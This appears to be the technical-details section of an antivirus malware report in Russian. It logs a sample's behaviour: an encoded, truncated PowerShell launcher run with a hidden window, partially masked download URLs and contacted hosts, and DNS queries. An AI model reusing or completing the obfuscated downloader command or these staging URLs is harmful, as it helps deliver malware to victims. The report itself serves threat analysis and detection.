Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABJADkAMABzAHUAZgAwAD0AKAAnAFAAdwB0AF8AJwArACcAMgAnACsAJwA0AGoAJwApADsALgAoACcAbgBlAHcALQAnACsAJwBpAHQAZQAnACsAJwBtACcAKQAgACQAZQBuAFYAOgBUAEUATQBwAFwAbwBmAGYASQBjAGUAMgAwADEAOQAgAC0AaQB0AG...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 2008
- %TEMP%\1097716.cvr
- 'tr###nsnow.com':80
- 'st#####3productions.com':80
- 'st#####3productions.com':443
- 're#####acilities.com':80
- 'se#####ibuidora.com.br':80
- 'vm##s.net':443
- 'x1.#.lencr.org':80
- 'si####fusion.net':80
- 'te####gentina.com':443
- http://tr###nsnow.com/flash/T9/
- http://www.st#####3productions.com/fonts/2v/
- http://se#####ibuidora.com.br/Lumine1.6/D/
- http://x1.#.lencr.org/
- http://si####fusion.net/forums/ZGR/
- 'st#####3productions.com':443
- 'vm##s.net':443
- 'te####gentina.com':443
- DNS ASK tr###nsnow.com
- DNS ASK st#####3productions.com
- DNS ASK re#####acilities.com
- DNS ASK se#####ibuidora.com.br
- DNS ASK vm##s.net
- DNS ASK x1.#.lencr.org
- DNS ASK si####fusion.net
- DNS ASK te####gentina.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABJADkAMABzAHUAZgAwAD0AKAAnAFAAdwB0AF8AJwArACcAMgAnACsAJwA0AGoAJwApADsALgAoACcAbgBlAHcALQAnACsAJwBpAHQAZQAnACsAJwBtACcAKQAgACQAZQBuAFYAOgBUAEUATQBwAFwAbwBmAGYASQBjAGUAMgAwADEAOQAgAC0AaQB0AG...' (со скрытым окном)